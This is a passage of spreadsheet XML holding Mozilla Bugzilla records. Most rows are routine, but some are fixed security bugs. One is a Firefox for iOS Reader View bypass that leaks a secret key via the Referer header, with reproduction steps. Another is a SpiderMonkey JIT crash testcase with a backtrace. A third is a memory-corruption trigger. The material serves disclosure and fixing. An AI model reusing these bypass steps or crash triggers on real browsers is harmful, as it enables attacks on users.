      <c r="N3104" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3104" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3104" t="inlineStr"/>
      <c r="Q3104" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3104" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3104" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3104" t="n">
        <v>1</v>
      </c>
      <c r="U3104" t="n">
        <v>0</v>
      </c>
      <c r="V3104" t="n">
        <v>9</v>
      </c>
      <c r="W3104" t="inlineStr">
        <is>
          <t>The daily mails "You bugzilla buglist need attention" (or so) is painfully
annoying. I leave bugs in state NEW as long as I am not sure, if I am the right
owner. I don't want to be spammed because of this. I know of these bugs anyway,
because I get a mail when they are (re)assigned to me.
Please disable this feature.</t>
        </is>
      </c>
      <c r="X3104" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3105">
      <c r="A3105" t="n">
        <v>282623</v>
      </c>
      <c r="B3105" t="inlineStr">
        <is>
          <t>2005-02-17 12:21:10 -0800</t>
        </is>
      </c>
      <c r="C3105" t="inlineStr">
        <is>
          <t>Remove globals.pl from checksetup</t>
        </is>
      </c>
      <c r="D3105" t="inlineStr">
        <is>
          <t>2006-06-26 05:14:41 -0700</t>
        </is>
      </c>
      <c r="E3105" t="n">
        <v>1</v>
      </c>
      <c r="F3105" t="n">
        <v>1</v>
      </c>
      <c r="G3105" t="n">
        <v>4</v>
      </c>
      <c r="H3105" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3105" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3105" t="inlineStr">
        <is>
          <t>Installation &amp; Upgrading</t>
        </is>
      </c>
      <c r="K3105" t="inlineStr">
        <is>
          <t>2.19.2</t>
        </is>
      </c>
      <c r="L3105" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3105" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3105" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3105" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3105" t="inlineStr"/>
      <c r="Q3105" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3105" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3105" t="inlineStr">
        <is>
          <t>Bugzilla 3.0</t>
        </is>
      </c>
      <c r="T3105" t="n">
        <v>1</v>
      </c>
      <c r="U3105" t="n">
        <v>0</v>
      </c>
      <c r="V3105" t="n">
        <v>5</v>
      </c>
      <c r="W3105" t="inlineStr">
        <is>
          <t>checksetup no longer requires globals.pl, now that Crypt() has been moved into a
module.</t>
        </is>
      </c>
      <c r="X3105" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3106">
      <c r="A3106" t="n">
        <v>1190523</v>
      </c>
      <c r="B3106" t="inlineStr">
        <is>
          <t>2015-08-03 12:41:39 -0700</t>
        </is>
      </c>
      <c r="C3106" t="inlineStr">
        <is>
          <t>Several errors shown in logs for Taskcluster B2G build for a green job</t>
        </is>
      </c>
      <c r="D3106" t="inlineStr">
        <is>
          <t>2019-02-08 13:19:49 -0800</t>
        </is>
      </c>
      <c r="E3106" t="n">
        <v>1</v>
      </c>
      <c r="F3106" t="n">
        <v>1</v>
      </c>
      <c r="G3106" t="n">
        <v>5</v>
      </c>
      <c r="H3106" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3106" t="inlineStr">
        <is>
          <t>Taskcluster</t>
        </is>
      </c>
      <c r="J3106" t="inlineStr">
        <is>
          <t>Services</t>
        </is>
      </c>
      <c r="K3106" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3106" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3106" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3106" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3106" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3106" t="inlineStr"/>
      <c r="Q3106" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3106" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3106" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3106" t="n">
        <v>1</v>
      </c>
      <c r="U3106" t="n">
        <v>0</v>
      </c>
      <c r="V3106" t="n">
        <v>10</v>
      </c>
      <c r="W3106" t="inlineStr">
        <is>
          <t>There seems to be some discrepancies in some job artifacts, at least on stage:
Steps to reproduce:
o open https://treeherder.allizom.org/#/jobs?repo=mozilla-inbound&amp;revision=6c082c23b9c6&amp;filter-searchStr=b2g%20L%20emulator%20opt
o select the last green successful B2G Emulator L opt job in the bottom row
o open that job's Logviewer link
https://treeherder.allizom.org/logviewer.html#?job_id=9061638&amp;repo=mozilla-inbound
In it we have a job artifact with "error_count: 4" but "result: success". And a corresponding UI with green success but failure steps styled in green. Camd mentioned he thought it's possible another regex tweak may be required.
The corresponding Task for that job is here
https://tools.taskcluster.net/task-inspector/#vkMKiv7xRNaImRYUK5LgyQ/0</t>
        </is>
      </c>
      <c r="X3106" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3107">
      <c r="A3107" t="n">
        <v>1643874</v>
      </c>
      <c r="B3107" t="inlineStr">
        <is>
          <t>2020-06-05 19:59:59 -0700</t>
        </is>
      </c>
      <c r="C3107" t="inlineStr">
        <is>
          <t>Crash in [@ mozilla::dom::Promise::MaybeSomething&lt;T&gt;]</t>
        </is>
      </c>
      <c r="D3107" t="inlineStr">
        <is>
          <t>2020-12-18 17:20:29 -0800</t>
        </is>
      </c>
      <c r="E3107" t="n">
        <v>1</v>
      </c>
      <c r="F3107" t="n">
        <v>1</v>
      </c>
      <c r="G3107" t="n">
        <v>3</v>
      </c>
      <c r="H3107" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3107" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3107" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3107" t="inlineStr">
        <is>
          <t>78 Branch</t>
        </is>
      </c>
      <c r="L3107" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3107" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N3107" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3107" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3107" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main78+][adv-esr68.10+][sec-survey]</t>
        </is>
      </c>
      <c r="Q3107" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3107" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S3107" t="inlineStr">
        <is>
          <t>mozilla79</t>
        </is>
      </c>
      <c r="T3107" t="n">
        <v>0</v>
      </c>
      <c r="U3107" t="n">
        <v>0</v>
      </c>
      <c r="V3107" t="n">
        <v>29</v>
      </c>
      <c r="W3107" t="inlineStr">
        <is>
          <t>This bug is for crash report bp-1c57af62-86cf-4afd-9dfb-acbb30200605.
Top 10 frames of crashing thread:
```
0 xul.dll mozilla::dom::Promise::MaybeSomething&lt;mozilla::ErrorResult&gt; dom/promise/Promise.h:327
1 xul.dll PromiseDocumentFlushedResolver::Call dom/base/nsGlobalWindowInner.cpp:816
2 xul.dll nsGlobalWindowInner::CallOrCancelDocumentFlushedResolvers&lt;1&gt; dom/base/nsGlobalWindowInner.cpp:6691
3 xul.dll nsGlobalWindowInner::DidRefresh dom/base/nsGlobalWindowInner.cpp:6762
4 xul.dll nsRefreshDriver::Tick layout/base/nsRefreshDriver.cpp:2263
5 xul.dll mozilla::RefreshDriverTimer::TickRefreshDrivers layout/base/nsRefreshDriver.cpp:350
6 xul.dll mozilla::RefreshDriverTimer::Tick layout/base/nsRefreshDriver.cpp:367
7 xul.dll mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver layout/base/nsRefreshDriver.cpp:745
8 xul.dll mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync layout/base/nsRefreshDriver.cpp:644
9 xul.dll mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyParentProcessVsync layout/base/nsRefreshDriver.cpp:565
```
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0 ID:20200604213430
Adblock Plus - free ad blocker 3.8.4
Amazon Assistant for Firefox 10.2005.6.12051
Amazon.com 1.1
Auto Tab Discard 0.3.5.2
Avast Online Security 20.1.480 [DISABLED]
Bing 1.1
DuckDuckGo 1.0
Duplicate Tabs Closer 3.5.1 [DISABLED]
Google 1.0
Nightly Tester Tools 4.0
NoScript 11.0.30
Print Selection to PDF 0.1.0 [DISABLED]
Screengrab! 2.18 [DISABLED]
SortTabs 1.1.0 [DISABLED]
Tab Counter 0.4.1
Tabliss 2.0.3 [DISABLED]
Tabs manager 1.8
Wikipedia (en) 1.0
eBay 1.0
Firefox 78.0b2 Crash Report [@ mozilla::dom::Promise::MaybeSomething&lt;T&gt; ]
You are seeing public data only. See protected data access documentation for more information.
Search Mozilla Support for this signature How to read this crash report
ID: 1c57af62-86cf-4afd-9dfb-acbb30200605
Signature: mozilla::dom::Promise::MaybeSomething&lt;T&gt;</t>
        </is>
      </c>
      <c r="X3107" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3108">
      <c r="A3108" t="n">
        <v>1654416</v>
      </c>
      <c r="B3108" t="inlineStr">
        <is>
          <t>2020-07-21 16:36:30 -0700</t>
        </is>
      </c>
      <c r="C3108" t="inlineStr">
        <is>
          <t>Bypass privileged internal: URL protetion through referrer</t>
        </is>
      </c>
      <c r="D3108" t="inlineStr">
        <is>
          <t>2024-09-15 23:51:06 -0700</t>
        </is>
      </c>
      <c r="E3108" t="n">
        <v>1</v>
      </c>
      <c r="F3108" t="n">
        <v>1</v>
      </c>
      <c r="G3108" t="n">
        <v>2</v>
      </c>
      <c r="H3108" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3108" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J3108" t="inlineStr">
        <is>
          <t>Reader View</t>
        </is>
      </c>
      <c r="K3108" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3108" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M3108" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N3108" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3108" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3108" t="inlineStr"/>
      <c r="Q3108" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3108" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S3108" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3108" t="n">
        <v>1</v>
      </c>
      <c r="U3108" t="n">
        <v>0</v>
      </c>
      <c r="V3108" t="n">
        <v>16</v>
      </c>
      <c r="W3108" t="inlineStr">
        <is>
          <t>Created attachment 9165250
Demonstrate uuidkey stealing attack
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.2 Safari/605.1.15
Steps to reproduce:
In Bug 1263627, secret key based privileged URLs protection was implemented for internal:// schemes.
If protection is bypassed, untrusted web content can still abuse a XSS bug in about/sessionrestore (Bug 1258188) and also still can get any cross origin web contents (Bug 1279787).
The bypass technique I found is below.
(1) Open Safari and visit http://csrf.jp/2020/uuidkey_stealer_entry.html
(2) Tap a firefox:// link in the page to launch exploit in ReaderView on Firefox for iOS.
    Note that this step is not mandatory, just a shortcut for easier reproduction.
(3) ReaderView frame is shown in Firefox for iOS, and wait for few seconds
(4) Tap "Load original page" in ReaderView
(5) Exploitation code at http://csrf.jp/2020/uuidkey_stealer.php is shown.
    Then secret key (uuidkey) is leaked through REFERER header
(6) Tap "Exploit Link", alert() by XSS is shown in internal://local (see attached video for demonstration)
Actual results:
As explaind at (5), secret key (uuidkey) is leaked to web page through REFERER header.
By using the key, untrusted web contents can abuse existing XSS bug on sessionrestore (Bug 1258188).
Expected results:
Set &lt;meta name="referrer" content="never"&gt; in ReaderViewLoading.html .
https://github.com/mozilla-mobile/firefox-ios/blob/76faae8c6c94e22c8fbc0de72e2d06f615738e2c/Client/Frontend/Reader/ReaderViewLoading.html#L7
That can stop the REFERER leakage.
The other HTML template `Reader.html` already has the same protection. Do the same thing.
https://github.com/mozilla-mobile/firefox-ios/blob/76faae8c6c94e22c8fbc0de72e2d06f615738e2c/Client/Frontend/Reader/Reader.html#L10</t>
        </is>
      </c>
      <c r="X3108" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3109">
      <c r="A3109" t="n">
        <v>1814899</v>
      </c>
      <c r="B3109" t="inlineStr">
        <is>
          <t>2023-02-03 06:49:59 -0800</t>
        </is>
      </c>
      <c r="C3109" t="inlineStr">
        <is>
          <t>MOZ_ASSERT(ionScript-&gt;containsReturnAddress(returnAddr)) at jit/JSJitFrameIter.cpp:71</t>
        </is>
      </c>
      <c r="D3109" t="inlineStr">
        <is>
          <t>2024-05-30 11:05:02 -0700</t>
        </is>
      </c>
      <c r="E3109" t="n">
        <v>1</v>
      </c>
      <c r="F3109" t="n">
        <v>1</v>
      </c>
      <c r="G3109" t="n">
        <v>3</v>
      </c>
      <c r="H3109" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3109" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3109" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K3109" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3109" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3109" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3109" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3109" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3109" t="inlineStr">
        <is>
          <t>[adv-main111+][adv-esr102.9+]</t>
        </is>
      </c>
      <c r="Q3109" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3109" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S3109" t="inlineStr">
        <is>
          <t>112 Branch</t>
        </is>
      </c>
      <c r="T3109" t="n">
        <v>1</v>
      </c>
      <c r="U3109" t="n">
        <v>0</v>
      </c>
      <c r="V3109" t="n">
        <v>19</v>
      </c>
      <c r="W3109" t="inlineStr">
        <is>
          <t>Steps to reproduce:
The attached sample crashes the js-shell on commit a7156afbfa575f12f60b1c8bf099d547c29bcadf when executed via commandline `--fuzzing-safe --gc-zeal=10`. The crash is flaky, but running it via `rr record --chaos` for some time should yield a crash. While the crash is in line `MOZ_ASSERT(ionScript-&gt;containsReturnAddress(returnAddr));`, the instruction is `mov rax,QWORD PTR [rbx+0x30]` instead of a normal assertion failure.
```
function f0(a1) {
    const v5 = [0,0,0,0,0,0,0,0];
    const v10 = new SharedArrayBuffer(1000, {});
    const v12 = new Int16Array();
    for (const v14 in v5.join(a1)) { } 
}
f0.toString = f0; 
for (let v15 = 0; v15 &lt; 100; v15++) {
    f0(f0);
}
f0();
this.unscopables;
```
```
#0  js::jit::JSJitFrameIter::checkInvalidation (this=&lt;optimized out&gt;, ionScriptOut=0x7ffe1b63b5c0)
    at js/src/jit/JSJitFrameIter.cpp:71
#1  0x00005564199cbe93 in js::jit::TraceIonJSFrame (trc=0x7ffe1b63b938, frame=...)
    at js/src/jit/JitFrames.cpp:947
#2  js::jit::TraceJitActivation (trc=0x7ffe1b63b938, activation=&lt;optimized out&gt;)
    at js/src/jit/JitFrames.cpp:1358
#3  js::jit::TraceJitActivations (cx=&lt;optimized out&gt;, trc=0x7ffe1b63b938) at js/src/jit/JitFrames.cpp:1400
#4  0x00005564193b6560 in js::gc::GCRuntime::traceRuntimeCommon (this=0x6d0133323788, trc=0x7ffe1b63b938, 
    traceOrMark=js::gc::GCRuntime::MarkRuntime) at js/src/gc/RootMarking.cpp:303
#5  0x00005564193b6300 in js::gc::GCRuntime::traceRuntimeForMajorGC (this=0x6d0133323788, trc=0x7ffe1b63b938, session=...)
    at js/src/gc/RootMarking.cpp:242
#6  0x000055641931cc57 in js::gc::GCRuntime::updateRuntimePointersToRelocatedCells (this=0x6d0133323788, session=...)
    at js/src/gc/Compacting.cpp:802
#7  js::gc::GCRuntime::compactPhase (this=0x6d0133323788, reason=JS::GCReason::DEBUG_GC, sliceBudget=..., session=...)
    at js/src/gc/Compacting.cpp:103
#8  0x0000556419341b8c in js::gc::GCRuntime::incrementalSlice (this=0x6d0133323788, budget=..., reason=JS::GCReason::DEBUG_GC, 
    budgetWasIncreased=&lt;optimized out&gt;) at js/src/gc/GC.cpp:3696
#9  0x0000556419346109 in js::gc::GCRuntime::gcCycle (this=0x6d0133323788, nonincrementalByAPI=false, budgetArg=..., 
    reason=JS::GCReason::DEBUG_GC) at js/src/gc/GC.cpp:4160
#10 0x0000556419346f63 in js::gc::GCRuntime::collect (this=0x6d0133323788, nonincrementalByAPI=&lt;optimized out&gt;, budget=..., 
    reason=JS::GCReason::DEBUG_GC) at js/src/gc/GC.cpp:4348
#11 0x0000556419311542 in js::gc::GCRuntime::runDebugGC (this=0x6d0133323788) at js/src/gc/GC.cpp:4795
#12 js::gc::GCRuntime::gcIfNeededAtAllocation (this=&lt;optimized out&gt;, cx=&lt;optimized out&gt;)
    at js/src/gc/Allocator.cpp:412
#13 js::gc::GCRuntime::checkAllocatorState&lt;(js::AllowGC)1&gt; (this=0x6d0133323788, cx=0x6d0133336600, 
    kind=js::gc::AllocKind::OBJECT2_BACKGROUND) at js/src/gc/Allocator.cpp:376
#14 0x000055641931095c in js::gc::detail::AllocateObject&lt;(js::AllowGC)1&gt; (cx=0x6d0133336600, kind=&lt;optimized out&gt;, nDynamicSlots=0, 
    heap=js::gc::TenuredHeap, clasp=0x556419f27090 &lt;js::PropertyIteratorObject::class_&gt;, site=0x0)
    at js/src/gc/Allocator.cpp:56
#15 0x00005564188f3319 in js::gc::CellAllocator::NewCell&lt;js::NativeObject, (js::AllowGC)1, js::gc::AllocKind&amp;, unsigned long const&amp;, js::gc::InitialHeap&amp;, JSClass const*&amp;, js::gc
::AllocSite*&amp;&gt; (cx=0x6d0133336600, args=&lt;optimized out&gt;, args=&lt;optimized out&gt;, 
--Type &lt;RET&gt; for more, q to quit, c to continue without paging--
     args=&lt;optimized out&gt;, args=&lt;optimized out&gt;) at js/src/gc/Allocator.h:123
#16 JSContext::newCell&lt;js::NativeObject, (js::AllowGC)1, js::gc::AllocKind&amp;, unsigned long const&amp;, js::gc::InitialHeap&amp;, JSClass const*&amp;, js::gc::AllocSite*&amp;&gt; (this=0x6d013333660
0, args=&lt;optimized out&gt;, args=&lt;optimized out&gt;, args=&lt;optimized out&gt;, args=&lt;optimized out&gt;, 
    args=&lt;optimized out&gt;) at js/src/vm/JSContext.h:266
#17 js::NativeObject::create (cx=0x6d0133336600, kind=js::gc::AllocKind::OBJECT2_BACKGROUND, heap=js::gc::TenuredHeap, shape=..., 
    site=0x0) at js/src/vm/NativeObject-inl.h:446
#18 0x0000556418b84b50 in NewPropertyIteratorObject (cx=0x6d0133336600) at js/src/vm/Iteration.cpp:803
#19 CreatePropertyIterator (cx=0x6d0133336600, objBeingIterated=..., props=..., supportsIndices=false, indices=0x0, numShapes=0)
    at js/src/vm/Iteration.cpp:845
#20 0x0000556418b7f0eb in GetIteratorImpl&lt;false&gt; (obj=..., cx=&lt;optimized out&gt;)
    at js/src/vm/Iteration.cpp:1262
#21 js::GetIterator (cx=0x6d0133336600, obj=...) at js/src/vm/Iteration.cpp:1293
#22 0x0000556418b86112 in js::ValueToIterator (cx=0x6d0133336600, vp=...) at js/src/vm/Iteration.cpp:1619
```</t>
        </is>
      </c>
      <c r="X3109" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3110">
      <c r="A3110" t="n">
        <v>1364030</v>
      </c>
      <c r="B3110" t="inlineStr">
        <is>
          <t>2017-05-11 04:06:03 -0700</t>
        </is>
      </c>
      <c r="C3110" t="inlineStr">
        <is>
          <t>Travis JS job is green even though the log shows tests are failing</t>
        </is>
      </c>
      <c r="D3110" t="inlineStr">
        <is>
          <t>2021-12-05 14:49:36 -0800</t>
        </is>
      </c>
      <c r="E3110" t="n">
        <v>1</v>
      </c>
      <c r="F3110" t="n">
        <v>1</v>
      </c>
      <c r="G3110" t="n">
        <v>7</v>
      </c>
      <c r="H3110" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3110" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3110" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K3110" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3110" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3110" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3110" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3110" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3110" t="inlineStr"/>
      <c r="Q3110" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3110" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3110" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3110" t="n">
        <v>1</v>
      </c>
      <c r="U3110" t="n">
        <v>0</v>
      </c>
      <c r="V3110" t="n">
        <v>4</v>
      </c>
      <c r="W3110" t="inlineStr">
        <is>
          <t>There are multiple failures visible in the logs of the JS run on Travis, however `yarn test` is still returning zero, which means the overall job shows as passing/green:
https://travis-ci.org/mozilla/treeherder/jobs/230892456
We need to:
1) Figure out why `yarn test` isn't exiting non-zero
2) Fix the test failures that have crept in whilst this has been broken
I'm guessing this is a regression from the Neutrino switch.</t>
        </is>
      </c>
      <c r="X3110" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3111">
      <c r="A3111" t="n">
        <v>331088</v>
      </c>
      <c r="B3111" t="inlineStr">
        <is>
          <t>2006-03-20 04:48:26 -0800</t>
        </is>
      </c>
      <c r="C3111" t="inlineStr">
        <is>
          <t>crash with &lt;input type=file&gt; and events</t>
        </is>
      </c>
      <c r="D3111" t="inlineStr">
        <is>
          <t>2009-10-27 12:22:57 -0700</t>
        </is>
      </c>
      <c r="E3111" t="n">
        <v>1</v>
      </c>
      <c r="F3111" t="n">
        <v>1</v>
      </c>
      <c r="G3111" t="n">
        <v>3</v>
      </c>
      <c r="H3111" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3111" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3111" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K3111" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3111" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3111" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3111" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3111" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3111" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q3111" t="inlineStr">
        <is>
          <t>P4</t>
        </is>
      </c>
      <c r="R3111" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3111" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3111" t="n">
        <v>1</v>
      </c>
      <c r="U3111" t="n">
        <v>0</v>
      </c>
      <c r="V3111" t="n">
        <v>68</v>
      </c>
      <c r="W3111" t="inlineStr">
        <is>
          <t>crash with &lt;input type=file&gt; and events
changing the type of input from file to text while the "file open" dialog
is open causes crash with signs of memory corruption.
the top of stack is NS_RELEASE and events are involved in the stack.
affects ff and seamonkey trunk.
ff 1.5 seems safe.</t>
        </is>
      </c>
      <c r="X3111" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3112">
      <c r="A3112" t="n">
        <v>883402</v>
      </c>
      <c r="B3112" t="inlineStr">
        <is>
          <t>2013-06-14 15:08:19 -0700</t>
        </is>
      </c>
      <c r="C3112" t="inlineStr">
        <is>
          <t>Create e.me view and webactivities in Fireplace</t>
        </is>
      </c>
      <c r="D3112" t="inlineStr">
        <is>
          <t>2013-09-16 17:51:54 -0700</t>
        </is>
      </c>
      <c r="E3112" t="n">
        <v>1</v>
      </c>
      <c r="F3112" t="n">
        <v>1</v>
      </c>
      <c r="G3112" t="n">
        <v>6</v>
      </c>
      <c r="H3112" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3112" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J3112" t="inlineStr">
        <is>
          <t>Consumer Pages</t>
        </is>
      </c>
      <c r="K3112" t="inlineStr">
        <is>
          <t>1.5</t>
        </is>
      </c>
      <c r="L3112" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3112" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3112" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3112" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3112" t="inlineStr">
        <is>
          <t>[qa-]</t>
        </is>
      </c>
      <c r="Q3112" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3112" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3112" t="inlineStr">
        <is>
          <t>2013-09-24</t>
        </is>
      </c>
      <c r="T3112" t="n">
        <v>1</v>
      </c>
      <c r="U3112" t="n">
        <v>0</v>
      </c>
      <c r="V3112" t="n">
        <v>4</v>
      </c>
      <c r="W3112" t="inlineStr">
        <is>
          <t>We co-opted bug 879437 to fix up the API. The API will accept a manifest_url as a search param and return the standard search results for that manifest_url. It should be just one object, probably best to check that somewhere.
When fireplace gets an activity like: 
https://bugzilla.mozilla.org/show_bug.cgi?id=879437#c10 
...it will do the search and then show the resulting app object (maybe doing a redirect). Or something like that.</t>
        </is>
      </c>
      <c r="X3112" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3113">
      <c r="A3113" t="n">
        <v>1383337</v>
      </c>
      <c r="B3113" t="inlineStr">
        <is>
          <t>2017-07-21 17:33:32 -0700</t>
        </is>
      </c>
      <c r="C3113" t="inlineStr">
        <is>
          <t>Add ability to disable sections in Activity Stream</t>
        </is>
      </c>
      <c r="D3113" t="inlineStr">
        <is>
          <t>2017-10-10 10:10:20 -0700</t>
        </is>
      </c>
      <c r="E3113" t="n">
        <v>1</v>
      </c>
      <c r="F3113" t="n">
        <v>1</v>
      </c>
      <c r="G3113" t="n">
        <v>2</v>
      </c>
      <c r="H3113" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3113" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J3113" t="inlineStr">
        <is>
          <t>Home screen</t>
        </is>
      </c>
      <c r="K3113" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3113" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M3113" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N3113" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3113" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3113" t="inlineStr">
        <is>
          <t>[mobileAS]</t>
        </is>
      </c>
      <c r="Q3113" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3113" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3113" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3113" t="n">
        <v>1</v>
      </c>
      <c r="U3113" t="n">
        <v>0</v>
      </c>
      <c r="V3113" t="n">
        <v>3</v>
      </c>
      <c r="W3113" t="inlineStr">
        <is>
          <t>Inside Activity Stream provide UI to disable each section individually. This lets people who might not like Highlights/Pocket stories to turn them off. 
Preferably this UI should exist inside the panel itself. Otherwise, no one will find it.</t>
        </is>
      </c>
      <c r="X3113" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3114">
      <c r="A3114" t="n">
        <v>532246</v>
      </c>
